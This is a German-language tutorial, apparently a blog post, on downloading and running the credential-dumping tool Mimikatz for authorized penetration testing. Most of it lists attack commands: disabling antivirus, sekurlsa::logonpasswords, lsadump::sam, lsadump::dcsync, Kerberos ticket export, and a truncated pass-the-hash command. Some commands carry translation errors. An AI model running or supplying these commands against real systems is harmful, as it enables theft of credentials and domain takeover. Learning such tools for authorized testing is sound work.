Einführung

Mimikatz ist ein leistungsfähiges Post-Exploitation-Tool, mit dem sich Klartext-Passwörter, Hashes, PIN-Codes und Kerberos-Tickets aus dem Speicher extrahieren lassen. Es wird häufig von Penetrationstestern und Sicherheitsexperten verwendet, um Systemschwachstellen zu bewerten. Dieser Leitfaden enthält eine schrittweise Anleitung zur Installation und Verwendung von Mimikatz für ethische Sicherheitstests.

Warnung: Die nicht autorisierte Verwendung von Mimikatz ist illegal. Vergewissern Sie sich, dass Sie eine Erlaubnis haben, bevor Sie es in irgendeiner Umgebung verwenden.

Voraussetzungen

Stellen Sie vor der Installation von Mimikatz sicher, dass Sie die folgenden Voraussetzungen erfüllen:

  • Einen Windows-Rechner(Windows 7 , 10, 11 oder Server-Versionen)
  • Administrative Berechtigungen
  • Deaktivieren Sie Windows Defender und jegliche Antivirensoftware (Mimikatz wird oft als Malware erkannt)

Herunterladen von Mimikatz

Mimikatz ist ein Open-Source-Tool, das auf GitHub verfügbar ist. Um es herunterzuladen:

  1. Öffnen Sie einen Webbrowser und gehen Sie zu https://github.com/gentilkiwi/mimikatz.
  2. Klicken Sie auf Code > ZIP herunterladen.
  3. Entpacken Sie die ZIP-Datei in einen Ordner Ihrer Wahl.

Alternativ dazu können Sie das Repository mit Git klonen:

 git clone https://github.com/gentilkiwi/mimikatz.git

Mimikatz ausführen

Da Mimikatz administrative Rechte erfordert, folgen Sie diesen Schritten, um es auszuführen:

  1. Öffnen Sie die Eingabeaufforderung oder PowerShell als Administrator.
  2. Navigieren Sie zu dem Ordner, in den Sie Mimikatz extrahiert haben:
    cd path\to\mimikatz\x64
  3. Führen Sie Mimikatz aus:
    mimikatz.exe
  4. Sie sollten eine Befehlszeilenschnittstelle mit der Eingabeaufforderung # mimikatz sehen.

Grundlegende Mimikatz-Befehle

1. Systemprivilegien prüfen

Bevor Sie die Anmeldeinformationen extrahieren, überprüfen Sie, ob Sie über ausreichende Rechte verfügen:

privileg::debug

Wenn Sie erfolgreich sind, sollten Sie sehen: Privileg '20' OK

2. Passwörter aus dem Speicher extrahieren

Um Klartext-Passwörter aus dem Speicher auszulesen, verwenden Sie:

sekurlsa::logonpasswords

Dies zeigt Benutzernamen, Domäne und Passwörter im Klartext an, falls vorhanden.

3. NTLM-Hashes ausgeben

NTLM-Hashes können für Pass-the-Hash-Angriffe verwendet werden. Um sie zu extrahieren, führen Sie aus:

lsadump::sam

Oder, für entfernte Systeme:

lsadump::dcsync /Domäne:Zieldomäne.com /Benutzer:Administrator

4. Extraktion von Kerberos-Tickets

Zum Abrufen von Kerberos-Tickets aus dem System:

sekurlsa::tickets /export

Dies exportiert .kirbi-Dateien, die für Pass-the-Ticket-Angriffe verwendet werden können.

5. Pass-the-Hash-Angriff

Zur Authentifizierung mit einem NTLM-Hash anstelle eines Passworts:

sekurlsa::pth /benutzer:Administrator /domäne:beispiel.com /ntlm: